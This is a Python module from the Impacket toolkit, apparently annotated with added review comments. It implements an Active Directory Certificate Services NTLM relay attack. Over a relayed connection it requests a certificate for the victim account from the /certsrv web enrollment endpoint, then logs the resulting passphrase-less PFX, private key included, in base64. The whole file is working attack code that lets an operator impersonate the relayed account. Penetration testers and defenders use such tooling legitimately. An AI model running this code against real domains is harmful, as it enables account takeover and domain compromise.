
1# Impacket - Collection of Python classes for working with network protocols. 

2# 

3# SECUREAUTH LABS. Copyright (C) 2018 SecureAuth Corporation. All rights reserved. 

4# 

5# This software is provided under a slightly modified version 

6# of the Apache Software License. See the accompanying LICENSE file 

7# for more information. 

8# 

9# Description: 

10# AD CS relay attack 

11# 

12# Authors: 

13# Ex Android Dev (@ExAndroidDev) 

14# Tw1sm (@Tw1sm) 

15 

16import re 

17import base64 

18from OpenSSL import crypto 

19 

20from impacket import LOG 

21 

# cache already attacked clients
# Module-level list of usernames that ADCSAttack._run() has already sent a
# certificate request for. It is shared by every ADCSAttack instance in the
# process and only ever grows; _run() checks it before doing any work.
ELEVATED = []

24 

25 

class ADCSAttack:
    """Request a certificate from an AD CS web enrollment endpoint over a relayed connection.

    The class relies on attributes that are set elsewhere (not visible in this
    file): ``self.username`` (the relayed account), ``self.config.template``
    (the certificate template name) and ``self.client`` (an object exposing
    ``request(method, url, body=..., headers=...)`` and ``getresponse()``,
    presumably an ``http.client``-style connection; confirm against the
    caller).
    """

    def _run(self):
        """Submit a CSR for ``self.username`` to /certsrv and log the resulting PFX.

        Side effects: sends two HTTP requests through ``self.client``, appends
        ``self.username`` to the module-level ``ELEVATED`` list and writes the
        base64 PKCS#12 blob to ``LOG``. Returns ``None`` in every path.
        """
        # A 4096-bit RSA key is generated before the ELEVATED check below, so
        # the (expensive) key generation happens even for users that are
        # skipped. NOTE(review): moving the check above the keygen would
        # preserve behaviour and avoid the wasted work.
        key = crypto.PKey()
        key.generate_key(crypto.TYPE_RSA, 4096)

        if self.username in ELEVATED:
            LOG.info('Skipping user %s since attack was already performed' % self.username)
            return
        # generate_csr() returns PEM bytes; the replacements below hand-roll the
        # form-urlencoding of the PEM block ('+' -> '%2b', ' ' -> '+').
        # NOTE(review): urllib.parse.quote_plus() is the stdlib equivalent.
        csr = self.generate_csr(key, self.username)
        csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
        LOG.info("CSR generated!")

        # Form body for certfnsh.asp; the template name comes from the config
        # and is interpolated as-is (no escaping).
        data = "Mode=newreq&CertRequest=%s&CertAttrib=CertificateTemplate:%s&TargetStoreFlags=0&SaveCert=yes&ThumbPrint=" % (csr, self.config.template)

        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Content-Type": "application/x-www-form-urlencoded",
            # Passed as an int; http.client's putheader() accepts ints, but
            # other client types may not -- depends on what self.client is.
            "Content-Length": len(data)
        }

        LOG.info("Getting certificate...")

        self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
        # NOTE(review): the user is recorded as done before the response is
        # read, so a failed enrollment (non-200 below, or no ReqID found) is
        # never retried for this username within the process.
        ELEVATED.append(self.username)
        response = self.client.getresponse()

        if response.status != 200:
            LOG.error("Error getting certificate! Make sure you have entered valid certiface template.")
            return

        # The enrollment page refers to the issued certificate by a ReqID in a
        # JavaScript redirect; the regex pulls the first such id out of the body.
        content = response.read()
        found = re.findall(r'location="certnew.cer\?ReqID=(.*?)&', content.decode())
        if len(found) == 0:
            LOG.error("Error obtaining certificate!")
            return

        certificate_id = found[0]

        # certificate_id is taken verbatim from the server response and spliced
        # into the request path without escaping.
        self.client.request("GET", "/certsrv/certnew.cer?ReqID=" + certificate_id)
        response = self.client.getresponse()

        LOG.info("GOT CERTIFICATE!")
        certificate = response.read().decode()

        # The PFX is exported without a passphrase (see generate_pfx) and the
        # whole blob, private key included, is written to the log at INFO level.
        certificate_store = self.generate_pfx(key, certificate)
        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))

    def generate_csr(self, key, CN: str) -> bytes:
        """Build a PKCS#10 CSR whose subject CN is ``CN``, signed with ``key``.

        Args:
            key: the ``crypto.PKey`` whose public half goes into the request
                and whose private half signs it (SHA-256).
            CN: subject Common Name.

        Returns:
            The CSR as PEM-encoded bytes.
        """
        LOG.info("Generating CSR...")
        req = crypto.X509Req()
        req.get_subject().CN = CN
        req.set_pubkey(key)
        req.sign(key, "sha256")

        return crypto.dump_certificate_request(crypto.FILETYPE_PEM, req)

    def generate_pfx(self, key, certificate: str) -> bytes:
        """Bundle a PEM certificate and its private key into a PKCS#12 blob.

        Args:
            key: the ``crypto.PKey`` matching the certificate.
            certificate: PEM-encoded certificate text.

        Returns:
            The PKCS#12 container as bytes. ``export()`` is called with no
            passphrase, so the private key inside is unencrypted.
        """
        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
        p12 = crypto.PKCS12()
        p12.set_certificate(certificate)
        p12.set_privatekey(key)
        return p12.export()